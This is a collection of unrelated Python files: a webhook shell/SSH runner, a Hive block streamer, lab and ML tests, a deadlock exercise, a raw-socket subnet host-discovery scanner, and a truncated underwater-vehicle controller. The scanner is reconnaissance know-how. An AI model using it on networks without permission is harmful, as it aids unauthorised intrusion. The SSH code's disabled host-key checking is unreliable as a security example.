| source | python |
|---|---|
utils.py
|
# -*- coding: utf-8 -*-
'''
Created on Mar 3, 2017
@author: hustcc
'''
from functools import wraps
from threading import Thread
import json
import click
import datetime
import copy
#from webhookit import app
import webhookit
try:
unicode # noqa
except NameError:
# py3
the_unicode = str # noqa
else: # noqa
# py2
the_unicode = unicode # noqa
def standard_response(success, data):
'''standard response
'''
rst = {}
rst['success'] = success
rst['data'] = data
return json.dumps(rst)
def run_async(f):
# NOTE: renamed from `async`, which is a reserved keyword since Python 3.7
@wraps(f)
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.daemon = True
thr.start()
return wrapper
# log
def log(t):
msg = '%s: %s' % (current_date(), t)
webhookit.app.WSHandler.push_msg({'type': 'log', 'msg': msg})  # `app` is reached via the webhookit package (the direct import above is commented out)
click.echo(msg)
def current_date():
return datetime.datetime.now().strftime("%y-%m-%d %H:%M:%S.%f")
def filter_server(server):
server = copy.deepcopy(server)
if is_remote_server(server):
server['HOST'] = '***.**.**.**'
server['PORT'] = '****'
server['USER'] = '*******'
server['PWD'] = '*******'
return server
# Filter sensitive fields out of the server configuration
def filter_sensitive(config):
fconfig = {}
for k, v in config.items():
fconfig[k] = []
for server in v:
fconfig[k].append(filter_server(server))
return fconfig
# if host port user pwd all is not empty, then it is a remote server.
def is_remote_server(s):
# all is not empty or zero, then remote server
return all([s.get('HOST', None),
s.get('PORT', None),
s.get('USER', None),
s.get('PWD', None)])
# ssh to exec cmd
def do_ssh_cmd(ip, port, account, pkey, shell, push_data='', timeout=300):
import paramiko
try:
import StringIO  # py2
except ImportError:
import io as StringIO  # py3: io.StringIO provides the same constructor used below
def is_msg_success(msg):
for x in ['fatal', 'fail', 'error']:
if msg.startswith(x) or msg.endswith(x):
return False
return True
try:
port = int(port)
except:
port = 22
s = paramiko.SSHClient()
s.load_system_host_keys()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# First try to log in using the SSH private key
pkey_file = StringIO.StringIO(pkey.strip() + '\n')  # note: a trailing newline is required
private_key = paramiko.RSAKey.from_private_key(pkey_file)
s.connect(ip, port, account, pkey=private_key, timeout=10)
pkey_file.close()
except:
# If key-based login raises an exception, fall back to password authentication
s.connect(ip, port, account, password=pkey, timeout=10)
# if push_data:
# shell = shell + (" '%s'" % push_data)
shell = shell.split('\n')
shell = [sh for sh in shell if sh.strip()]
shell = ' && '.join(shell)
stdin, stdout, stderr = s.exec_command(shell, timeout=timeout)
msg = stdout.read()
err = stderr.read()
success = True
if not msg and err:
success = False
msg = err
s.close()
if success:
success = is_msg_success(msg)
return (success, msg)
# Execute asynchronously in a separate thread
@run_async
def do_webhook_shell(server, data):
log('Start to process server: %s' % json.dumps(filter_server(server)))
script = server.get('SCRIPT', '')
if script:
if is_remote_server(server):
# ip, port, account, pkey, shell, push_data='', timeout=300
log('Start to execute remote SSH command. %s' % script)
(success, msg) = do_ssh_cmd(server.get('HOST', None),
server.get('PORT', 0),
server.get('USER', None),
server.get('PWD', None),
server.get('SCRIPT', ''),
data)
else:
log('Start to execute local command. %s' % script)
# local; `commands` is py2-only, getstatusoutput moved to subprocess in py3
try:
import commands
except ImportError:
import subprocess as commands
(status_code, msg) = commands.getstatusoutput(server.get('SCRIPT', ''))
# exit status 0 means success (the original `x and False or True` expression always evaluated to True)
success = (status_code == 0)
else:
success = False
msg = 'There is no SCRIPT configured.'
# end exec, log data
if isinstance(msg, bytes):
msg = the_unicode(msg, errors='ignore')
msg = (msg or '').strip()
msg = msg.replace('\n', ' ')
log('Completed execute: (%s, %s)' % (success, msg))
return True
|
blocks.py
|
import os
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from threading import Thread
from hive_plug_play.engine.processor import BlockProcessor
from hive_plug_play.hive.server_requests import make_request
from hive_plug_play.utils.tools import UTC_TIMESTAMP_FORMAT
from hive_plug_play.server.system_status import SystemStatus
BATCH_SIZE = 1000
IRREVERSIBLE_GAP = 20
BLOCK_TIME_SECS = 3
class BlockStream:
def __init__(self, start_block):
self._start_block = start_block
self._dynamic_global_props = {}
self._buffer = {}
self._cache = {}
self._hive_head_block = None
self._prev_hash = None
Thread(target=self._start_stream).start()
def _fetch_dynamic_global_props(self):
props = make_request("condenser_api.get_dynamic_global_properties")
self._hive_head_block = props['head_block_number']
self._hive_block_time = datetime.strptime(props['time'], UTC_TIMESTAMP_FORMAT)
self._irreversible_block = props['last_irreversible_block_num']
def _fetch_block(self, block_num):
while True:
resp = make_request("block_api.get_block", {"block_num": block_num})
if 'block' not in resp: continue
block = resp['block']
return [block_num, block]
def _is_valid_block(self, num, block):
if not self._prev_hash: return True # skip check for first block to be processed
match = block['previous'] == self._prev_hash
if match:
return True
else:
print(f"Invalid block detected: {num}")
return False
def _fetch_multiple_blocks(self, start, end):
"""Retrieves blocks from `start` to `end`, inclusive."""
print(f"\nFetching blocks: {start} to {end}")
while True:
upper = start + BATCH_SIZE if (end-start) > BATCH_SIZE else end
blocks_expected = range(start, upper+1)
timer_start = datetime.utcnow()
with ThreadPoolExecutor(max_workers=60) as executor:
futures = (executor.submit(self._fetch_block, block_num) for block_num in blocks_expected)
for future in as_completed(futures):
res = future.result()
self._add_block_to_cache(res[0], res[1])
timer_end = datetime.utcnow()
remaining = end - upper
timer_remaining = (((timer_end - timer_start).seconds)/ BATCH_SIZE) * remaining
print(f"Remaining: {remaining} blocks | {str(timedelta(seconds=timer_remaining))}", end='\r')
if remaining == 0: break
start = upper
def _add_block_to_cache(self, num, block):
self._cache[num] = block
def _wait_for_block(self, block_num):
while True:
self._fetch_dynamic_global_props()
gap = self._hive_head_block - block_num
if gap >= 0:
return
else:
delay = abs(gap) * BLOCK_TIME_SECS
print(f"Waiting for {delay} secs")
time.sleep(delay)
def is_behind_schedule(self):
current_time = datetime.utcnow()
if self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*11)) < current_time:
return True
else:
return False
def _prune_block(self, block_num):
del self._cache[block_num]
def _start_stream(self):
self._fetch_dynamic_global_props()
gap = self._hive_head_block - self._start_block
if gap < 0:
# a future block, wait
self._wait_for_block(self._start_block)
gap = self._hive_head_block - self._start_block
print(f"DB is {gap} blocks behind.")
Thread(target=self._feeder).start()
self._fetch_multiple_blocks(self._start_block, self._hive_head_block)
print("\nInitial blocks fetch complete.\n")
time.sleep(5)
Thread(target=self._streamer).start()
def _streamer(self):
# start the stream
while True:
current_time = datetime.utcnow()
if current_time > self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*10)):
next_block = self._latest_block + 1
block = self._fetch_block(next_block)
self._add_block_to_cache(next_block, block[1])
SystemStatus.set_sync_status(
self._latest_block,
self._latest_block_time,
self.is_behind_schedule()
)
if (self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*20))) < current_time:
# catchup if behind
self._fetch_dynamic_global_props()
self._fetch_multiple_blocks(
(self._latest_block + 1),
(self._hive_head_block)
)
time.sleep(0.3)
def _feeder(self):
block_to_push = self._start_block
while True:
while block_to_push not in self._cache:
time.sleep(0.1)
# check before pushing
block = self._cache[block_to_push]
if self._is_valid_block(block_to_push, block):
self._prev_hash = block['block_id']
else:
print("Invalid block detected.")
os._exit(1) # TODO: replace with standby
BlockProcessor.process_block(block_to_push, self._cache[block_to_push])
self._latest_block = block_to_push
self._latest_block_time = datetime.strptime(
block['timestamp'],
UTC_TIMESTAMP_FORMAT
)
SystemStatus.set_sync_status(
self._latest_block,
self._latest_block_time,
self.is_behind_schedule()
)
self._prune_block(block_to_push)
block_to_push += 1
|
test_daq_device.py
|
# Test daq device.
#
# Copyright (C) 2010-2012 Huang Xin
#
# See LICENSE.TXT that came with this file.
import time
import Pyro.core
import threading
import Queue
from SpikeRecord.Plexon.PlexClient import PlexClient
from SpikeRecord.Plexon.PlexUtil import PlexUtil
from Experimenter.Experiments.Experiment import ExperimentConfig,Experiment
class SoftTriggerReceiver(Pyro.core.ObjBase):
""" Trigger stamps receiver
"""
def __init__(self,host,port):
Pyro.core.ObjBase.__init__(self)
self.server_host = host
self.disp_queue = Queue.Queue()
self.comp_queue = Queue.Queue()
threading.Thread(target=self.create_pyro_server,kwargs={'host':host,'port':port}).start()
def put_stamp(self, value):
self.disp_queue.put_nowait(value)
self.comp_queue.put_nowait(value)
def get_comp_stamp(self):
return self.comp_queue.get(timeout=3.0)
def get_all_stamps(self):
stamp_list = []
try:
while True:
stamp_list.append(self.disp_queue.get_nowait())
except:
pass
return stamp_list
def create_pyro_server(self,host,port):
Pyro.config.PYRO_MULTITHREADED = 0
Pyro.core.initServer()
self.pyro_daemon = Pyro.core.Daemon(host=host,port=port)
self.PYRO_URI = self.pyro_daemon.connect(self, 'trigger_receiver')
if self.pyro_daemon.port != port:
raise RuntimeError("Pyro daemon cannot run on port %d. " %port +
"Probably the port has already been taken up by another pyro daemon.")
self.pyro_daemon.requestLoop()
class TestDAQTriggerExp(Experiment):
""" Test DAQ device experiment.
"""
def __init__(self,receiver_host,receiver_port,params,*args,**kwargs):
super(TestDAQTriggerExp, self).__init__(*args,**kwargs)
self.source = 'sparsenoise_test_daq.py'
self.exp_name = ExperimentConfig.CELLPREFIX + '-daq-test'
self.receiver_host = receiver_host
self.receiver_port = receiver_port
self.params = params
self.assignments = ["trigger_receiver_host = '%s'" %self.receiver_host,
"trigger_receiver_port = %d" %self.receiver_port ]
self.pc = PlexClient()
self.pc.InitClient()
self.pu = PlexUtil()
def run(self):
super(TestDAQTriggerExp, self).run()
self.run_stimulus(left_params=self.params, assignments=self.assignments)
self.test(mode="strobed")
def test(self, mode="strobed"):
""" Stimulus will run on StimServer with a regular stamp controller posting
stamps via DAQ device and a soft stamp controller writting stamps to a
trigger receiver running at receiver host. The sweep stamps of both controllers
are the same. And a PlexClient is started to collect stamps sent by DAQ device.
In the meantime, a pyro server is started to receive stamps send by soft stamp
controller. And the stamps are compared between two receivers to see if the
stamps are pairly identical.
"""
trig_receiver = SoftTriggerReceiver(host=self.receiver_host,port=self.receiver_port)
DAQ_nstamps = 0
Soft_nstamps = 0
failed_times = 0
finished = False
while not finished:
data = self.pc.GetTimeStampArrays()
if mode == "strobed":
daq_stamps = self.pu.GetExtEvents(data, event='first_strobe_word')
elif mode == "unstrobed":
daq_stamps = self.pu.GetExtEvents(data, event='unstrobed_word')
DAQ_nstamps += len(daq_stamps['value'])
daq_words_str = ','.join(str(stamp) for stamp in daq_stamps['value'])
soft_stamps = trig_receiver.get_all_stamps()
Soft_nstamps += len(soft_stamps)
soft_words_str = ','.join(str(stamp) for stamp in soft_stamps)
with open("test_daq_device.txt",'a') as self.output:
if len(daq_words_str) > 0:
self._log_test("Found daq trigger words: %s" %daq_words_str)
if len(soft_words_str) > 0:
self._log_test("Found soft trigger words: %s" %soft_words_str)
for index,(value,timestamp) in enumerate(zip(daq_stamps['value'],daq_stamps['timestamp'])) :
self._log_test("Stamp index:%d" % index)
self._log_test("Found DAQ stamps:%d, Soft stamps:%d" % (DAQ_nstamps, Soft_nstamps))
self._log_test("found daq trigger word: %d t=%f" % (value,timestamp))
try:
soft_stamp = trig_receiver.get_comp_stamp()
except:
self._log_test("found no soft trigger word")
break
self._log_test("found soft trigger word: %d" %soft_stamp)
try:
assert value == soft_stamp
except:
failed_times += 1
self._log_test("Assertion failed:\n\tDAQ stamp:\t%d\t(%s)\tt=%f\n\tSoft stamp:\t%d\t(%s)" \
% (value,bin(value),timestamp,soft_stamp,bin(soft_stamp)))
self._log_test("Assertion failed times:%d\n" % failed_times)
time.sleep(1.0)
def _log_test(self, line):
print(line)
self.output.write(line + "\n")
if __name__ == '__main__':
ExperimentConfig(data_base_dir='data_test',stim_server_host='192.168.1.1',new_cell=True)
dummy_exp = Experiment()
p_left = dummy_exp.get_stimulus_params(eye='left')
TestDAQTriggerExp(receiver_host='192.168.1.2',receiver_port=8118,params=p_left).run()
|
deadlock.py
|
import random
import time
import threading
from typing import List, Optional
threads: List[Optional[threading.Thread]] = [None]
lock_map = {}
def go_wait():
# Wait for other threads to initialize
time.sleep(0.25)
# Pick a thread at random
thread = random.choice(
list(filter(lambda k: k != threading.current_thread(), threads)))
# Fill in the `lock map`
lock_map[threading.current_thread()] = thread
if thread is not None:
# Wait for the thread to finish
print(f"[{threading.current_thread().getName()}] Waiting for {thread.getName()}...")
thread.join()
else:
# We picked no thread
print(f"[{threading.current_thread().getName()}] Not waiting on any thread!")
# Announce we're done!
print(f"[{threading.current_thread().getName()}] Done!")
for i in range(5):
thread = threading.Thread(target=go_wait)
threads.append(thread)
thread.start()
# Wait for everything to get started
time.sleep(0.5)
# Two steps to this challenge:
# 1) Use the `lock_map` to detect a deadlock (think about _cycles_)
# 2) Depending on the deadlock(s) you find, kill as few threads as possible to end the deadlock.
# You can kill threads with `thread._stop()`
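# A minimal sketch of step 1, assuming `lock_map` maps each thread to the
# thread it is join()-ing on (illustrative only; `find_wait_cycle` is not part
# of the original challenge code):
def find_wait_cycle(wait_map):
    """Return a list of threads forming a wait cycle, or None if there is none."""
    for start in wait_map:
        seen = []
        current = start
        # Follow the "waits on" edges until we fall off the map or revisit a node
        while current is not None and current in wait_map:
            if current in seen:
                return seen[seen.index(current):]
            seen.append(current)
            current = wait_map[current]
    return None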
|
test_nce_remote_table_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
from dist_test_utils import *
from paddle.fluid.transpiler.distribute_transpiler import DistributedMode
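# Reference NumPy implementation of the NCE forward pass used to validate the
# remote-table operator below: each true/sampled class gets a logit
# sigmoid(x . w_c + b_c), and its cost is -log(p / (p + q)) for true labels and
# -log(q / (p + q)) for negative samples, where q = num_sample_class / num_classes.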
def nce(input, weight, bias, sample_weight, labels, num_classes,
num_sample_class):
samples = []
sample_labels = []
batch_size = input.shape[0]
num_true_class = labels.shape[1]
for i in range(batch_size):
w = 1 if sample_weight is None else sample_weight[i]
for label in labels[i]:
samples.append((i, label, True, w))
sample_labels.append(label)
for num in range(num_sample_class):
samples.append((i, num, False, w))
sample_labels.append(num)
# forward bias
sample_out = np.zeros(len(samples)).astype(np.float32)
if bias is not None:
for i in range(len(samples)):
sample_out[i] = bias[samples[i][1]]
# forward weight
for i in range(len(samples)):
sample_out[i] += np.dot(input[samples[i][0]], weight[samples[i][1]])
# forward activation
sample_out = 1.0 / (1.0 + np.exp(-sample_out))
# forward cost
out = np.zeros(batch_size).astype(np.float32)
b = 1.0 / num_classes * num_sample_class
for i in range(len(samples)):
o = sample_out[i]
cost = -np.log(o / (o + b)) if samples[i][2] else -np.log(b / (o + b))
out[samples[i][0]] += cost * samples[i][3]
return (out[:, np.newaxis], np.array(sample_out).reshape(
batch_size, num_sample_class + num_true_class),
np.array(sample_labels).reshape(batch_size,
num_sample_class + num_true_class))
def run_pserver(pserver_id, use_cuda, sync_mode):
remove_ps_flag(os.getpid())
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((5, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10 + 1
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"distributed_mode": DistributedMode.SYNC,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, use_cuda, sync_mode, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, use_cuda, sync_mode))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_nce_op_two_pserver(self, place, port0, port1):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
x = scope.var('Input').get_tensor()
x_array = np.random.random((4, 8)).astype("float32")
x.set(x_array, place)
# create and initialize Param Variable
param = scope.var('Weight').get_tensor()
param_array = np.zeros((5, 8)).astype("float32")
param.set(param_array, place)
bias = scope.var('Bias').get_tensor()
bias_array = np.random.random((5, 1)).astype("float32")
bias.set(bias_array, place)
sample_w = scope.var('SampleWeight').get_tensor()
sample_weight = np.random.random((4, 1)).astype("float32")
sample_w.set(sample_weight, place)
label = scope.var('Label').get_tensor()
label_array = np.array([[0], [1], [4], [3]])
label.set(label_array, place)
cost = scope.var('Cost').get_tensor()
cost_w = np.zeros((4, 1)).astype("float32")
cost.set(cost_w, place)
sample_l = scope.var('SampleLogits').get_tensor()
sample_l_w = np.zeros((4, 3)).astype("float32")
sample_l.set(sample_l_w, place)
sample_la = scope.var('SampleLabels').get_tensor()
sample_la_w = np.zeros((4, 3)).astype("int")
sample_la.set(sample_la_w, place)
emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
table_names = ['table', 'table']
height_sections = [2, 3]
# create and run nce operator
nce_op = Operator(
"nce",
Input='Input',
Weight='Weight',
Label='Label',
Bias='Bias',
Cost='Cost',
SampleLogits='SampleLogits',
SampleLabels='SampleLabels',
SampleWeight='SampleWeight',
num_total_classes=5,
num_neg_samples=2,
custom_neg_classes=list(range(2)),
sampler=0,
seed=0,
is_sparse=True,
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
nce_op.run(scope, place)
# get and compare result
o_cost = np.array(scope.var('Cost').get_tensor())
o_logits = np.array(scope.var('SampleLogits').get_tensor())
o_labels = np.array(scope.var('SampleLabels').get_tensor())
param_array = np.ones((5, 8)).astype("float32")
for i in range(2):
param_array[i] *= param_array[i] * i + 0 * 10 + 1
for i in range(2, 5):
param_array[i] *= param_array[i] * i + 1 * 10 + 1
out = nce(x_array, param_array, bias_array, sample_weight,
label_array, 5, 2)
np.testing.assert_almost_equal(o_cost, out[0], decimal=6)
np.testing.assert_almost_equal(o_logits, out[1], decimal=6)
np.testing.assert_almost_equal(o_labels, out[2], decimal=6)
def test_nce_op_remote(self):
os.environ['PADDLE_ENABLE_REMOTE_PREFETCH'] = "1"
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, False, True, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, False, True, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
for place in places:
self._run_nce_op_two_pserver(place, port0, port1)
# raise SIGTERM to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
if __name__ == '__main__':
unittest.main()
|
scanner.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 12:18:41 2020
@author: edoardottt
"""
import socket
import threading
import time
import os
import struct
from netaddr import IPNetwork, IPAddress
from ctypes import *
# host to listen on
host = "192.168.0.180"
# subnet to target
subnet = "192.168.0.0/24"
# magic string we'll check ICMP responses for
magic_message = "PYTHONRULES!"
# this sprays out the UDP datagram
def udp_sender(subnet, magic_message):
time.sleep(5)
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message.encode(), (str(ip), 65212))
except:
pass
# our IP header
class IP(Structure):
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
("src", c_uint32),
("dst", c_uint32),
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
# human readable IP addresses
self.src_address = socket.inet_ntoa(struct.pack("@I", self.src))
self.dst_address = socket.inet_ntoa(struct.pack("@I", self.dst))
# human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
# our ICMP header
class ICMP(Structure):
_fields_ = [
("type", c_ubyte),
("code", c_ubyte),
("checksum", c_ushort),
("unused", c_ushort),
("next_hop_mtu", c_ushort),
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
pass
# check the OS
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# start sending the UDP datagrams in a separate thread
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
t.start()
try:
while True:
# read in a packet
raw_buffer = sniffer.recvfrom(65565)[0]
# create an IP header from the first 20 bytes of the buffer
ip_header = IP(raw_buffer[:20])
# print out the protocol that was detected and the hosts
print(
"Protocol {} {} -> {}".format(
ip_header.protocol, ip_header.src_address, ip_header.dst_address
)
)
# if it's ICMP, we want it
if ip_header.protocol == "ICMP":
# calculate where our ICMP packet starts
offset = ip_header.ihl * 4
buf = raw_buffer[offset : offset + sizeof(ICMP)]
# create a new ICMP structure
icmp_header = ICMP(buf)
print(
"ICMP -> Type: {} Code: {}".format(icmp_header.type, icmp_header.code)
)
if icmp_header.code == 3 and icmp_header.type == 3:
# make sure host is our target subnet
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# make sure it has our magic message
if (
raw_buffer[len(raw_buffer) - len(magic_message):]
== magic_message.encode()
):
print("Host Up: {}".format(ip_header.src_address))
# handle CTRL + C
except KeyboardInterrupt:
# if we're using Windows, turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
|
auv_geometric_tracking_controller.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
import math
import numpy as np
import traceback
import threading
import rclpy
import tf2_ros
from rclpy.node import Node
import geometry_msgs.msg as geometry_msgs
from nav_msgs.msg import Odometry
import uuv_control_msgs.msg as uuv_control_msgs
from uuv_thrusters.models import Thruster
from uuv_gazebo_ros_plugins_msgs.msg import FloatStamped
from uuv_control_msgs.msg import TrajectoryPoint
from uuv_control_interfaces import DPControllerLocalPlanner
#from tf_quaternion.transformations import quaternion_matrix
from tf_quaternion.transformations import quaternion_multiply
from tf_quaternion.transformations import quaternion_inverse
from tf_quaternion.transformations import euler_from_quaternion
from plankton_utils.param_helper import parse_nested_params_to_dict, \
get_parameter_or_helper
from plankton_utils.time import is_sim_time
from plankton_utils.time import time_in_float_sec
from utils.transform import get_world_ned_to_enu
class AUVGeometricTrackingController(Node):
def __init__(self, name, world_ned_to_enu=None,**kwargs):
super().__init__(name,
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
**kwargs)
# sim_time = rclpy.parameter.Parameter('use_sim_time', rclpy.Parameter.Type.BOOL, True)
# self.set_parameters([sim_time])
self.namespace = self.get_namespace().replace('/', '')
self.get_logger().info('Initialize control for vehicle <%s>' % self.namespace)
self.local_planner = DPControllerLocalPlanner(self, full_dof=True, thrusters_only=False,
stamped_pose_only=False, tf_trans_world_ned_to_enu=world_ned_to_enu)
self.base_link = self.get_parameter_or_helper('base_link', 'base_link').get_parameter_value().string_value
# Reading the minimum thrust generated
self.min_thrust = self.get_parameter_or_helper('min_thrust', 0.0).value
assert self.min_thrust >= 0
self.get_logger().info('Min. thrust [N]=%.2f' % self.min_thrust)
# Reading the maximum thrust generated
self.max_thrust = self.get_parameter_or_helper('max_thrust', 0.0).value
assert self.max_thrust > 0 and self.max_thrust > self.min_thrust
self.get_logger().info('Max. thrust [N]=%.2f' % self.max_thrust)
# Reading the thruster topic
self.thruster_topic = self.get_parameter_or_helper('thruster_topic', 'thrusters/id_0/input').get_parameter_value().string_value
assert len(self.thruster_topic) > 0
# Reading the thruster gain
self.p_gain_thrust = self.get_parameter_or_helper('thrust_p_gain', 0.0).value
assert self.p_gain_thrust > 0
self.d_gain_thrust = self.get_parameter_or_helper('thrust_d_gain', 0.0).value
assert self.d_gain_thrust >= 0
# Reading the roll gain
self.p_roll = self.get_parameter_or_helper('p_roll', 0.0).value
assert self.p_roll > 0
# Reading the pitch P gain
self.p_pitch = self.get_parameter_or_helper('p_pitch', 0.0).value
assert self.p_pitch > 0
# Reading the pitch D gain
self.d_pitch = self.get_parameter_or_helper('d_pitch', 0.0).value
assert self.d_pitch >= 0
# Reading the yaw P gain
self.p_yaw = self.get_parameter_or_helper('p_yaw', 0.0).value
assert self.p_yaw > 0
# Reading the yaw D gain
self.d_yaw = self.get_parameter_or_helper('d_yaw', 0.0).value
assert self.d_yaw >= 0
# Reading the saturation for the desired pitch
self.desired_pitch_limit = self.get_parameter_or_helper('desired_pitch_limit', 15 * np.pi / 180).value
assert self.desired_pitch_limit > 0
# Reading the saturation for yaw error
self.yaw_error_limit = self.get_parameter_or_helper('yaw_error_limit', 1.0).value
assert self.yaw_error_limit > 0
# Reading the number of fins
self.n_fins = self.get_parameter_or_helper('n_fins', 0).get_parameter_value().integer_value
assert self.n_fins > 0
# Reading the mapping for roll commands
self.map_roll = self.get_parameter_or_helper('map_roll', [0, 0, 0, 0]).value
assert isinstance(self.map_roll, list)
assert len(self.map_roll) == self.n_fins
# Reading the mapping for the pitch commands
self.map_pitch = self.get_parameter_or_helper('map_pitch', [0, 0, 0, 0]).value
assert isinstance(self.map_pitch, list)
assert len(self.map_pitch) == self.n_fins
# Reading the mapping for the yaw commands
self.map_yaw = self.get_parameter_or_helper('map_yaw', [0, 0, 0, 0]).value
assert isinstance(self.map_yaw, list)
assert len(self.map_yaw) == self.n_fins
# Retrieve the thruster configuration parameters
self.thruster_config = self.get_parameters_by_prefix('thruster_config')
#Parse parameters to dictionary and unpack params to values
self.thruster_config = parse_nested_params_to_dict(self.thruster_config, '.', True)
# Check if all necessary thruster model parameter are available
thruster_params = ['conversion_fcn_params', 'conversion_fcn',
'topic_prefix', 'topic_suffix', 'frame_base', 'max_thrust']
for p in thruster_params:
if p not in self.thruster_config:
raise RuntimeError(
'Parameter <%s> for thruster conversion function is '
'missing' % p)
# Setting up the thruster topic name
self.thruster_topic = self.build_thruster_topic_name(self.namespace,
self.thruster_config['topic_prefix'], 0,
self.thruster_config['topic_suffix'])
# self.thruster_topic = '/%s/%s/id_%d/%s' % (self.namespace,
# self.thruster_config['topic_prefix'], 0,
# self.thruster_config['topic_suffix'])
self.max_fin_angle = self.get_parameter_or_helper('max_fin_angle', 0.0).value
assert self.max_fin_angle > 0
# Reading the fin input topic prefix
self.fin_topic_prefix = self.get_parameter_or_helper('fin_topic_prefix', 'fins').get_parameter_value().string_value
self.fin_topic_suffix = self.get_parameter_or_helper('fin_topic_suffix', 'input').get_parameter_value().string_value
self.rpy_to_fins = np.vstack((self.map_roll, self.map_pitch, self.map_yaw)).T
self.pub_cmd = list()
self.odometry_sub = None
self.reference_pub = None
self.error_pub = None
self.tf_buffer = tf2_ros.Buffer()
self.listener = tf2_ros.TransformListener(self.tf_buffer, self)
self._ready = False
self.init_future = rclpy.Future()
self.init_thread = threading.Thread(target=self._init_async, daemon=True)
self.init_thread.start()
# =========================================================================
def _init_async(self):
try:
self._init_async_impl()
except Exception as e:
self.get_logger().error('Caught exception: ' + repr(e))
traceback.print_exc()
# =========================================================================
def _init_async_impl(self):
base = '%s/%s' % (self.namespace, self.base_link)
frame = '%s/%s%d' % (self.namespace, self.thruster_config['frame_base'], 0)
self.get_logger().info('Lookup: waiting for thruster transform %s -> %s' % (base, frame))
trans = self.tf_buffer.lookup_transform(base, frame, rclpy.time.Time(), rclpy.time.Duration(seconds=5))
pos = np.array([trans.transform.translation.x,
trans.transform.translation.y,
